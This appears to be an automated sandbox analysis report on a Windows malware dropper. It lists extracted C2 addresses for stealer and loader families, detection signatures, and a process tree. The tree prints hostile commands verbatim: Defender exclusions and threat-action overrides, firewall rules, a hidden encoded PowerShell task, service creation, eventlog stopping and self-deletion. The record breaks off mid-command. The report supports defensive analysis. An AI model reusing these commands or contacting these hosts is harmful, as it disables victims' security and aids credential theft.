Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02-04-2024 10:39
Static task
static1
Behavioral task
behavioral1
Sample
6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
Resource
win10v2004-20240226-en
General
-
Target
6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
-
Size
4.5MB
-
MD5
20ed8b8eb556fa3cbc88b83882a6f1b0
-
SHA1
cd7ce6fc0068b6ef9c37d5dafec1319a39b88709
-
SHA256
6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421
-
SHA512
868b859bdff27e41f63b527590214ad22dcaf332bb3d5c7daafd295ea648d71d5bd6d01fee29587eee8b7d4ef01384089eb0b2408f3d2e048021701c357e3b9b
-
SSDEEP
98304:in1GhDYSAEbWAtdt7Eea0+JJHOBMT6yCltq5CFvxWof8e45D4UO38cYd5:0gYfux7EF0CHqI6Xg5CFvxW2Pe
Malware Config
Extracted
stealc
http://185.172.128.26
-
url_path
/f993692117a3fda2.php
Extracted
vidar
https://steamcommunity.com/profiles/76561199658817715
https://t.me/sa9ok
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.0:29587
Extracted
smokeloader
2022
http://nidoe.org/tmp/index.php
http://sodez.ru/tmp/index.php
http://uama.com.ua/tmp/index.php
http://talesofpirates.net/tmp/index.php
Extracted
smokeloader
pub3
Extracted
gcleaner
185.172.128.90
5.42.65.64
-
url_path
/advdlc.php
Signatures
-
Detect Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2408-609-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral2/memory/2408-614-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral2/memory/2408-602-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2592-533-0x0000000000CF0000-0x0000000001380000-memory.dmp family_zgrat_v1 C:\Users\Admin\Documents\GuardFox\XaGaTSXhNtijen16_0lenmqv.exe family_zgrat_v1 C:\Users\Admin\Documents\GuardFox\XaGaTSXhNtijen16_0lenmqv.exe family_zgrat_v1 -
Glupteba payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2080-641-0x0000000000400000-0x0000000002F43000-memory.dmp family_glupteba behavioral2/memory/1640-608-0x0000000005050000-0x000000000593B000-memory.dmp family_glupteba behavioral2/memory/2080-714-0x0000000000400000-0x0000000002F43000-memory.dmp family_glupteba -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4128-612-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3036 netsh.exe 4420 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\GuardFox\QadmWEMvZP1u5zn6BUZr8mOC.exe themida behavioral2/memory/2788-619-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-621-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-625-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-634-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-638-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-639-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-642-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-724-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-554-0x0000000000680000-0x0000000001654000-memory.dmp themida behavioral2/memory/2788-444-0x0000000000680000-0x0000000001654000-memory.dmp themida -
Processes:
resource yara_rule behavioral2/memory/2012-574-0x00000000005F0000-0x0000000000EE1000-memory.dmp vmprotect behavioral2/memory/2012-613-0x00000000005F0000-0x0000000000EE1000-memory.dmp vmprotect C:\Users\Admin\Documents\GuardFox\gi8sxNU7MDQfdTU225Np_T6j.exe vmprotect -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 api.myip.com 8 api.myip.com 10 ipinfo.io 14 ipinfo.io -
Drops file in System32 directory 4 IoCs
Processes:
6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe File opened for modification C:\Windows\System32\GroupPolicy 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 3728 sc.exe 4832 sc.exe 1576 sc.exe 2900 sc.exe -
Program crash 13 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process 1916 756 WerFault.exe 1904 4788 WerFault.exe 3160 2160 WerFault.exe OB3O4OOzCsPjC3JerYeXP28s.exe 5084 756 WerFault.exe 4440 756 WerFault.exe 4256 756 WerFault.exe 4836 2408 WerFault.exe 1636 756 WerFault.exe 4904 756 WerFault.exe 4756 756 WerFault.exe 3160 756 WerFault.exe 432 2332 WerFault.exe miI6pz185KVt4jb91OmpgVms.exe 3028 2592 WerFault.exe XaGaTSXhNtijen16_0lenmqv.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4804 schtasks.exe 4852 schtasks.exe 3728 schtasks.exe 2008 schtasks.exe 3184 schtasks.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1272 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exepid process 3984 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe 3984 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe 3984 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe 3984 6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe"C:\Users\Admin\AppData\Local\Temp\6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe"1⤵
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3984 -
C:\Users\Admin\Documents\GuardFox\9a4mD7BDoXeoJOcQxdUIpeAK.exe"C:\Users\Admin\Documents\GuardFox\9a4mD7BDoXeoJOcQxdUIpeAK.exe"2⤵PID:2628
-
C:\Users\Admin\AppData\Local\Temp\7zS4C85.tmp\Install.exe.\Install.exe3⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\7zS5781.tmp\Install.exe.\Install.exe /vdidM "525403" /S4⤵PID:4480
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵PID:5052
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:4104
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:4832
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:4612
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:2280
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:1464
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:4948
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:5080
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNiVmqFUp" /SC once /ST 07:33:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:4804 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNiVmqFUp"5⤵PID:2120
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNiVmqFUp"5⤵PID:1632
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btbwILgIDOMomJfKYB" /SC once /ST 10:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\sXXaMmB.exe\" RD /GPsite_idTzJ 525403 /S" /V1 /F5⤵
- Creates scheduled task(s)
PID:4852 -
C:\Users\Admin\Documents\GuardFox\xwcY_fovQ9Nheje5CV8jHjgo.exe"C:\Users\Admin\Documents\GuardFox\xwcY_fovQ9Nheje5CV8jHjgo.exe"2⤵PID:1640
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵PID:4788
-
C:\Users\Admin\Documents\GuardFox\xwcY_fovQ9Nheje5CV8jHjgo.exe"C:\Users\Admin\Documents\GuardFox\xwcY_fovQ9Nheje5CV8jHjgo.exe"3⤵PID:3208
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:3892
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:5080
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:4420 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:1632
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:4000
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵PID:4476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2752
-
C:\Users\Admin\Documents\GuardFox\Q1Z5NOZZFZ_QCZ246twJajsv.exe"C:\Users\Admin\Documents\GuardFox\Q1Z5NOZZFZ_QCZ246twJajsv.exe"2⤵PID:2316
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:1636
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:3660
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:2532
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:3024
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
PID:2900 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
PID:3728 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:1576 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
PID:4832 -
C:\Users\Admin\Documents\GuardFox\QadmWEMvZP1u5zn6BUZr8mOC.exe"C:\Users\Admin\Documents\GuardFox\QadmWEMvZP1u5zn6BUZr8mOC.exe"2⤵PID:2788
-
C:\Users\Admin\Documents\GuardFox\DMJSAzQ6WPPGCt8v99gapGlM.exe"C:\Users\Admin\Documents\GuardFox\DMJSAzQ6WPPGCt8v99gapGlM.exe"2⤵PID:2080
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵PID:2944
-
C:\Users\Admin\Documents\GuardFox\DMJSAzQ6WPPGCt8v99gapGlM.exe"C:\Users\Admin\Documents\GuardFox\DMJSAzQ6WPPGCt8v99gapGlM.exe"3⤵PID:4612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:1296
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:876
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:3036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2560
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:1008
-
C:\Users\Admin\Documents\GuardFox\6fbTxJuydRu9hVB13nmqo6gD.exe"C:\Users\Admin\Documents\GuardFox\6fbTxJuydRu9hVB13nmqo6gD.exe"2⤵PID:3876
-
C:\Users\Admin\Documents\GuardFox\J7sUa110XhBRTm1KFDbVGpqC.exe"C:\Users\Admin\Documents\GuardFox\J7sUa110XhBRTm1KFDbVGpqC.exe"2⤵PID:1524
-
C:\Users\Admin\AppData\Local\Temp\is-L9C97.tmp\J7sUa110XhBRTm1KFDbVGpqC.tmp"C:\Users\Admin\AppData\Local\Temp\is-L9C97.tmp\J7sUa110XhBRTm1KFDbVGpqC.tmp" /SL5="$601CA,1891431,54272,C:\Users\Admin\Documents\GuardFox\J7sUa110XhBRTm1KFDbVGpqC.exe"3⤵PID:4620
-
C:\Users\Admin\AppData\Local\Website Screenshot Generator\wsgen.exe"C:\Users\Admin\AppData\Local\Website Screenshot Generator\wsgen.exe" -i4⤵PID:2784
-
C:\Users\Admin\AppData\Local\Website Screenshot Generator\wsgen.exe"C:\Users\Admin\AppData\Local\Website Screenshot Generator\wsgen.exe" -s4⤵PID:1604
-
C:\Users\Admin\Documents\GuardFox\kk9hxkHrD7aKJBoqukjRDGax.exe"C:\Users\Admin\Documents\GuardFox\kk9hxkHrD7aKJBoqukjRDGax.exe"2⤵PID:756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 7443⤵
- Program crash
PID:1916 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 7523⤵
- Program crash
PID:5084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 7963⤵
- Program crash
PID:4440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 8043⤵
- Program crash
PID:4256 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 9603⤵
- Program crash
PID:4904 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 9923⤵
- Program crash
PID:1636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 13323⤵
- Program crash
PID:4756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "kk9hxkHrD7aKJBoqukjRDGax.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\kk9hxkHrD7aKJBoqukjRDGax.exe" & exit3⤵PID:4752
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "kk9hxkHrD7aKJBoqukjRDGax.exe" /f4⤵
- Kills process with taskkill
PID:1272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 13563⤵
- Program crash
PID:3160 -
C:\Users\Admin\Documents\GuardFox\miI6pz185KVt4jb91OmpgVms.exe"C:\Users\Admin\Documents\GuardFox\miI6pz185KVt4jb91OmpgVms.exe"2⤵PID:2332
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe"3⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe"C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe"4⤵PID:3972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\FCAAEBFHJJ.exe5⤵PID:5008
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30006⤵
- Runs ping.exe
PID:3988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 24483⤵
- Program crash
PID:432 -
C:\Users\Admin\Documents\GuardFox\_p1nia4ZzsIljp9Oe3N9AKjO.exe"C:\Users\Admin\Documents\GuardFox\_p1nia4ZzsIljp9Oe3N9AKjO.exe"2⤵PID:2812
-
C:\Users\Admin\Documents\GuardFox\22h5zPDU9jBmyosVdDznG9Xi.exe"C:\Users\Admin\Documents\GuardFox\22h5zPDU9jBmyosVdDznG9Xi.exe"2⤵PID:4788
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3520
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 21164⤵
- Program crash
PID:4836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 7963⤵
- Program crash
PID:1904 -
C:\Users\Admin\Documents\GuardFox\XaGaTSXhNtijen16_0lenmqv.exe"C:\Users\Admin\Documents\GuardFox\XaGaTSXhNtijen16_0lenmqv.exe"2⤵PID:2592
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵PID:1532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2592 -s 10163⤵
- Program crash
PID:3028 -
C:\Users\Admin\Documents\GuardFox\MdMHewhckNGFOy6oTTUTHLxR.exe"C:\Users\Admin\Documents\GuardFox\MdMHewhckNGFOy6oTTUTHLxR.exe"2⤵PID:2172
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3184 -
C:\Users\Admin\Documents\GuardFox\m92sAzi2QnMeaJgKJbkY1J4g.exe"C:\Users\Admin\Documents\GuardFox\m92sAzi2QnMeaJgKJbkY1J4g.exe"2⤵PID:4728
-
C:\Users\Admin\Documents\GuardFox\gi8sxNU7MDQfdTU225Np_T6j.exe"C:\Users\Admin\Documents\GuardFox\gi8sxNU7MDQfdTU225Np_T6j.exe"2⤵PID:2012
-
C:\Users\Admin\Documents\GuardFox\OB3O4OOzCsPjC3JerYeXP28s.exe"C:\Users\Admin\Documents\GuardFox\OB3O4OOzCsPjC3JerYeXP28s.exe"2⤵PID:2160
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 7923⤵
- Program crash
PID:3160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 756 -ip 7561⤵PID:4644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4788 -ip 47881⤵PID:3912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2160 -ip 21601⤵PID:576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 756 -ip 7561⤵PID:2128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 756 -ip 7561⤵PID:4176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 756 -ip 7561⤵PID:4300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 756 -ip 7561⤵PID:1496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2408 -ip 24081⤵PID:3680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 756 -ip 7561⤵PID:3460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:3868
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 756 -ip 7561⤵PID:3704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 756 -ip 7561⤵PID:2120
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵PID:3992
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:4696
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:2540
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:3028
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:3628
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4324
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:3008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2332 -ip 23321⤵PID:2616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2592 -ip 25921⤵PID:4296
-
C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\sXXaMmB.exeC:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\sXXaMmB.exe RD /GPsite_idTzJ 525403 /S1⤵PID:4472
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD 